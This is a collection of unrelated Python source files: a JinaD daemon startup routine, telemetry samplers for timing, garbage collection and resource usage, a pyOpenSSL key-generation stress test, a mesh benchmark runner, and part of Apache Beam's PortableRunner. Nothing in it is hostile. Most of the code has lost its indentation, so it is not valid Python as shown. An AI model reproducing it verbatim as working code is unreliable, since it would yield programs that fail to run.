app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'flow',
'description': 'API to manage a Flow',
}
)
return app
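# Illustrative sketch (not part of the original module): serving one of the partial
# apps directly with uvicorn instead of going through setup(). Host and port are
# placeholder values, not the daemon defaults.
def _example_partial_app():
    """Hedged usage sketch: build the 'pod' app and run it with uvicorn."""
    app = _get_app(mode='pod')
    config = Config(app=app, host='127.0.0.1', port=8001, log_level='error')
    Server(config=config).run()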
def _update_default_args():
global jinad_args, __root_workspace__
jinad_args = _get_run_args()
__root_workspace__ = '/workspace' if jinad_args.mode else jinad_args.workspace
def _start_fluentd():
daemon_logger.info('starting fluentd...')
cfg = os.path.join(__resources_path__, 'fluent.conf')
try:
fluentd_proc = subprocess.Popen(
['fluentd', '-c', cfg],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
bufsize=0,
universal_newlines=True,
)
# avoid printing debug logs for partial daemon (jinad_args is set)
if jinad_args.mode is None:
for line in fluentd_proc.stdout:
daemon_logger.debug(f'fluentd: {line.strip()}')
except FileNotFoundError:
daemon_logger.warning('fluentd not found locally, jinad cannot stream logs!')
jinad_args.no_fluentd = True
def _start_consumer():
from .tasks import ConsumerThread
ConsumerThread().start()
def _start_uvicorn(app: 'FastAPI'):
config = Config(
app=app,
host=jinad_args.host,
port=jinad_args.port_expose,
loop='uvloop',
log_level='error',
)
server = Server(config=config)
server.run()
def setup():
"""Setup steps for JinaD"""
_update_default_args()
pathlib.Path(__root_workspace__).mkdir(parents=True, exist_ok=True)
if not jinad_args.no_fluentd:
Thread(target=_start_fluentd, daemon=True).start()
_start_consumer()
_start_uvicorn(app=_get_app(mode=jinad_args.mode))
def teardown():
"""Cleanup steps for JinaD"""
from jina import __stop_msg__
daemon_logger.success(__stop_msg__)
daemon_logger.close()
def main():
"""Entrypoint for JinaD"""
try:
setup()
except KeyboardInterrupt:
pass
except Exception as e:
        daemon_logger.info(f'error while server was running: {e!r}')
finally:
teardown()
|
sampler.py
|
"""
Samplers to measure durations and garbage collection.
You instantiate a sampler with an ``ObservationBucket`` where sampled time
series get buffered. The bucket (memory buffer) is thread-safe and gets
automatically flushed to secondary storage when it fills up.
"""
import gc
from resource import getrusage, RUSAGE_SELF
from threading import Thread
from time import perf_counter, sleep
from uuid import uuid4
from server.telemetry.observation import ObservationBucket, observe, \
observe_many
class Timer:
"""
Thread-safe timer.
Examples:
>>> from time import sleep
>>> timer = Timer()
>>> outer_timer_id = timer.start()
>>> sleep(0.1)
>>> inner_timer_id = timer.start()
>>> sleep(0.1)
>>> inner_duration = timer.stop(inner_timer_id)
>>> sleep(0.1)
>>> outer_duration = timer.stop(outer_timer_id)
>>> outer_duration - inner_duration > 0.2
True
"""
def __init__(self):
"""
Create a new instance.
"""
self._timers = {}
@staticmethod
def _new_timer_id() -> str:
timer_id = uuid4()
return timer_id.hex
def start(self) -> str:
"""
Start a timer.
:return: the timer ID.
"""
timer_id = self._new_timer_id() # unique, avoids race conditions.
self._timers[timer_id] = perf_counter()
return timer_id
def stop(self, timer_id) -> float:
"""
Stop a previously started timer and compute how much time has elapsed
since starting it.
:param timer_id: the timer ID returned by the start call.
:return: time elapsed, in fractional seconds, from the start call.
"""
duration = perf_counter() - self._timers.pop(timer_id)
return duration
# NOTE. pop gets rid of the timer to keep memory footprint small
class DurationSampler:
"""
Samples durations, storing them in a given ``ObservationBucket``.
Examples:
>>> from time import sleep
>>> from server.telemetry.observation import measured
# Create a bucket with an action to print the measured values for the
# key "k". Set memory threshold to 0 to force calling the action on
# every write to the underlying observation store.
>>> def print_it(store): \
print([f"{measured(v):0.1}" for v in store.get('k',[])])
>>> bkt = ObservationBucket(empty_action=print_it, memory_threshold=0)
# Create a sampler with the above bucket as backend store.
>>> sampler = DurationSampler(bkt)
>>> sample_id = sampler.sample()
>>> sleep(0.1)
>>> sampler.collect('k', sample_id)
['0.1']
>>> sample_id = sampler.sample()
>>> sleep(0.2)
>>> sampler.collect('k', sample_id)
['0.2']
# Call the empty method when done sampling to make sure any left over
# data gets passed to the empty action which can then store it away.
>>> sampler.bucket().empty()
[]
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
self._timer = Timer()
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self) -> str:
"""
Start a duration sample.
:return: the sample ID.
"""
return self._timer.start()
def collect(self, key: str, sample_id: str):
"""
End the specified duration sample and add it to the samples identified
by the given key.
:param key: identifies the duration series where the current sample
should be added.
:param sample_id: the sample ID as returned by the sample method when
the sample was started.
"""
duration = self._timer.stop(sample_id)
self._bucket.put(observe(key, duration))
GC_COLLECTIONS = 'gc collections'
"""
Label for the series of total GC collections measured by the ``GCSampler``.
"""
GC_COLLECTED = 'gc collected'
"""
Label for the series of total GC collected items measured by the ``GCSampler``.
"""
GC_UNCOLLECTABLE = 'gc uncollectable'
"""
Label for the series of total GC "uncollectable" items measured by the
``GCSampler``.
"""
class GCSampler:
"""
Produces aggregate stats about Python garbage collection.
This class generates the three series below.
**GC collections**. Each measurement in the series represents the total
number of times the GC collector swept memory since the interpreter was
started. (This is the total across all generations.) The series is labelled
with the value of ``GC_COLLECTIONS``.
**GC collected**. Each measurement in the series represents the total
number of objects the GC collector freed since the interpreter was started.
(This is the total across all generations.) The series is labelled with
the value of ``GC_COLLECTED``.
**GC uncollectable**. Each measurement in the series represents the total
number of objects the GC collector couldn't free since the interpreter was
started. (This is the total across all generations.) The series is labelled
with the value of ``GC_UNCOLLECTABLE``.
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self):
"""
Sample the GC, aggregate the data, and add them to the series.
"""
xs = gc.get_stats()
data = [(x['collections'], x['collected'], x['uncollectable'])
for x in xs]
total_collections, total_collected, total_uncollectable = 0, 0, 0
for d in data:
total_collections += d[0]
total_collected += d[1]
total_uncollectable += d[2]
ys = observe_many((GC_COLLECTIONS, total_collections),
(GC_COLLECTED, total_collected),
(GC_UNCOLLECTABLE, total_uncollectable))
self._bucket.put(*ys)
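# Illustrative sketch (not part of the original module): collecting a few GC samples
# into a bucket and flushing them. The print-based empty action mirrors the
# DurationSampler doctest above; it is an assumption, not a required API.
def _example_gc_sampler():
    """Hedged usage sketch for GCSampler."""
    def print_it(store):
        print(len(store.get(GC_COLLECTIONS, [])))
    bucket = ObservationBucket(empty_action=print_it, memory_threshold=0)
    sampler = GCSampler(bucket)
    for _ in range(3):
        sampler.sample()       # appends one point to each GC_* series
    bucket.empty()             # hand any buffered data to the empty action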
PROC_USER_TIME = 'user time'
"""
Label for the user time series produced by the ``ProcSampler``.
"""
PROC_SYSTEM_TIME = 'system time'
"""
Label for the system time series produced by the ``ProcSampler``.
"""
PROC_MAX_RSS = 'max rss'
"""
Label for the maximum RSS series produced by the ``ProcSampler``.
"""
class ProcSampler:
"""
Collects OS resource usage data about this running process.
This class generates the three series below.
**User Time**. Each measurement in the series is the total amount of
time, in seconds, the process spent executing in user mode. The series
is labelled with the value of ``PROC_USER_TIME``.
**System Time**. Each measurement in the series is the total amount of
time, in seconds, the process spent executing in kernel mode. The series
is labelled with the value of ``PROC_SYSTEM_TIME``.
**Maximum RSS**. Each measurement in the series is maximum resident set
size used. The value will be in kilobytes on Linux and bytes on MacOS.
The series is labelled with the value of ``PROC_MAX_RSS``.
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self):
"""
Probe process user time, system (kernel) time, maximum RSS and add
these values to their respective series.
"""
try:
os_data = getrusage(RUSAGE_SELF)
xs = observe_many((PROC_USER_TIME, os_data.ru_utime),
(PROC_SYSTEM_TIME, os_data.ru_stime),
(PROC_MAX_RSS, os_data.ru_maxrss))
self._bucket.put(*xs)
except (OSError, AttributeError): # AttributeError if os_data is None
return None
class RuntimeBackgroundSampler:
"""
Convenience class to sample GC and OS metrics at regular intervals in a
background daemon thread.
The thread goes on forever until the program exits, calling ``GCSampler``
and ``ProcSampler`` every ``sampling_interval`` seconds to collect GC and
OS-level metrics using a bucket you specify.
Just before the program exits, you should call the bucket's ``empty``
method to make sure any left over sampled data still in the memory buffer
gets processed by the bucket's empty action.
Usage pattern:
::
# at process start up
bucket = ObservationBucket(...)
RuntimeBackgroundSampler(bucket).spawn()
# background thread collects data...
# just before the process exits
bucket.empty()
Convenient, but not very flexible: there's no way to stop the background
thread and the thread dies abruptly when the program exits. This means
``RuntimeBackgroundSampler`` isn't suitable for buckets with empty actions
    that shouldn't be killed at random.
"""
def __init__(self, bucket: ObservationBucket,
sampling_interval: float = 1.0):
self._gc_sampler = GCSampler(bucket)
self._proc_sampler = ProcSampler(bucket)
self._interval = sampling_interval
def _run(self):
while True:
self._gc_sampler.sample()
self._proc_sampler.sample()
sleep(self._interval)
def spawn(self):
"""
Start the background sampling thread.
"""
t = Thread(target=self._run, args=())
t.daemon = True # (*)
t.start()
# NOTE. Daemon thread. This makes sure the program won't wait on this
# thread to complete before exiting, which is what we want b/c of the
# infinite loop in the run method. The downside is that when the Python
# interpreter quits, this thread will be interrupted abruptly.
|
thread-key-gen.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in RSA and DSA key generation. 0.12 and
# older held the GIL during these operations. Subsequent versions release it
# during them.
from threading import Thread
from OpenSSL.crypto import TYPE_RSA, TYPE_DSA, PKey
def generate_rsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_RSA, 1024)
keys.append(key)
def generate_dsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_DSA, 512)
keys.append(key)
def main():
threads = []
for i in range(3):
t = Thread(target=generate_rsa, args=())
threads.append(t)
t = Thread(target=generate_dsa, args=())
threads.append(t)
for t in threads:
t.start()
main()
|
run_benchmark.py
|
# Helper class to run tasks in multiple processes
import os
import subprocess
import shutil
import random
import argparse
import sys
from threading import Thread
from queue import Queue
# Simple task queue
class ShellTaskQueue(Queue):
def __init__(self, nWorkers=1, timeout=99999999999):
Queue.__init__(self)
self.nWorkers = nWorkers
self.timeout = timeout
self.task_count = 0
for i in range(self.nWorkers):
t = Thread(target=self.worker)
t.daemon = True
t.start()
def add_task(self, cmd_str):
self.put((self.task_count, cmd_str))
self.task_count += 1
def worker(self):
while True:
id, cmd_str = self.get()
print("running task {} / {} {}\n".format(id+1, self.task_count, cmd_str))
with subprocess.Popen(cmd_str, shell=True, stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'), preexec_fn=os.setsid) as process:
try:
output = process.communicate(timeout=self.timeout)[0]
except subprocess.TimeoutExpired:
print(" Timeout on {} :(".format(cmd_str))
os.killpg(process.pid, subprocess.signal.SIGINT) # send signal to the process group
output = process.communicate()[0]
except Exception as e:
print(" EXCEPTION ON {} !!!!".format(cmd_str))
print(str(e))
self.task_done()
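# Illustrative sketch (not part of this script's normal flow): the queue pattern used
# by main() below, reduced to its essentials. The echo commands are placeholders.
def _example_task_queue():
    queue = ShellTaskQueue(nWorkers=2, timeout=60)
    for i in range(4):
        queue.add_task("echo task {}".format(i))
    queue.join()    # block until every queued command has finished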
# location of flip binaries, assumed relative to this file
BIN_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "build", "bin"))
def ensure_dir_exists(d):
if not os.path.exists(d):
os.makedirs(d)
def parse_file_list(f):
    names = set()
    with open(f, 'r') as file_list:
        for line in file_list:
            # skip blank lines and comments
            if not line.strip() or line.startswith('#'):
                continue
            raw_name = line.strip()
            name, _ = os.path.splitext(os.path.basename(raw_name))
            names.add(name)
    return names
def main():
parser = argparse.ArgumentParser()
# Build arguments
parser.add_argument('--dataset_dir', type=str, required=True, help='directory of mesh files to run on')
parser.add_argument('--output_dir', type=str, required=True, help='where to put results')
parser.add_argument('--good_list', type=str, help='file with meshes which should be used (optional, otherwise all used. ignores paths and extensions.)')
parser.add_argument('--bad_list', type=str, help='file with meshes which should not be used, even if on good list (optional, otherwise none skipped)')
parser.add_argument('--n_threads', type=int, default=1, help='number of threads to run on')
parser.add_argument('--timeout', type=int, default=600, help='task timeout in seconds')
parser.add_argument('--max_meshes', type=int, default=-1)
parser.add_argument('--use_ffield_cones', action='store_true', help='use cones from a *.ffield file (must have the same base name as the mesh file and be in dataset_dir)')
parser.add_argument('--save_parameterized_meshes', action='store_true', help='save parameterized meshes as well as performance statistics. Meshes are placed in output_dir/meshes/')
# Parse arguments
args = parser.parse_args()
mesh_dir = os.path.join(args.output_dir, 'meshes')
ensure_dir_exists(args.output_dir)
if args.save_parameterized_meshes:
ensure_dir_exists(mesh_dir)
# save the arguments
with open(os.path.join(args.output_dir,"run_args.txt"), 'w') as f:
argstr = " ".join(sys.argv)
f.write(argstr)
# Deal with lists
if args.good_list:
good_set = parse_file_list(args.good_list)
if args.bad_list:
bad_set = parse_file_list(args.bad_list)
# Load the list of meshes
meshes = []
for f in os.listdir(args.dataset_dir):
# respect lists
f_name , f_ext = os.path.splitext(os.path.basename(f))
if f_ext not in [".obj", ".stl", ".ply", ".off"]:
continue
if args.good_list and f_name not in good_set:
continue
if args.bad_list and f_name in bad_set:
continue
meshes.append(os.path.join(args.dataset_dir, f))
if args.max_meshes > 0 and len(meshes) >= args.max_meshes:
break
print("Found {} input mesh files".format(len(meshes)))
# random.shuffle(meshes)
task_queue = ShellTaskQueue(nWorkers=args.n_threads, timeout=args.timeout)
for m_path in meshes:
m_basename = os.path.basename(m_path)
m_base, m_ext = os.path.splitext(m_basename)
if m_ext not in [".obj", ".stl", ".ply", ".off"]:
continue
output_path = os.path.join(args.output_dir, m_base + ".tsv")
ffield_path = os.path.join(os.path.splitext(m_path)[0] + ".ffield")
ffield_option = f"--ffield={ffield_path}" if args.use_ffield_cones else ""
output_mesh_path = os.path.join(mesh_dir, m_base + ".obj")
mesh_save_option = f"--outputMeshFilename={output_mesh_path}" if args.save_parameterized_meshes else ""
cmd_list = [
os.path.join(BIN_DIR,"parameterize"),
m_path,
ffield_option,
mesh_save_option,
f"--outputLogFilename={output_path}"
]
# build the command
cmd_str = " ".join(cmd_list)
task_queue.add_task(cmd_str)
task_queue.join()
if __name__ == "__main__":
main()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
from __future__ import absolute_import
from __future__ import division
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
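# Illustrative sketch (not part of the original module): the prepare/stage/run
# sequence wrapped by submit(). 'job_service' and 'options' are assumed to come from
# PortableRunner.create_job_service(); 'proto_pipeline' from get_proto_pipeline().
def _example_submit(job_service, options, proto_pipeline):
  """Hedged usage sketch for JobServiceHandle."""
  handle = JobServiceHandle(job_service, options)
  job_id, message_stream, state_stream = handle.submit(proto_pipeline)
  for message in message_stream:
    _LOGGER.info("job %s: %s", job_id, message)
  return state_stream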
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
    # Eventually remove the 'pre_optimize' option altogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
translations.eliminate_common_key_with_none,
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.eliminate_common_key_with_none,
# TODO(BEAM-11715): Enable translations.pack_combiners.
# translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.eliminate_common_key_with_none,
# TODO(BEAM-11715): Enable translations.pack_combiners.
# translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('eliminate_common_key_with_none',
'pack_combiners',
'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
      # All (known) portable runners (i.e. Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
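  # Illustrative query (assumes `result` is a finished PipelineResult from
  # this runner; MetricsFilter comes from apache_beam.metrics.metric):
  #
  #   from apache_beam.metrics.metric import MetricsFilter
  #   counters = result.metrics().query(
  #       MetricsFilter().with_name('my_counter'))[PortableMetrics.COUNTERS]
  #
  # Each entry is a MetricResult holding both the committed and attempted
  # values combined by _combine above.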
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
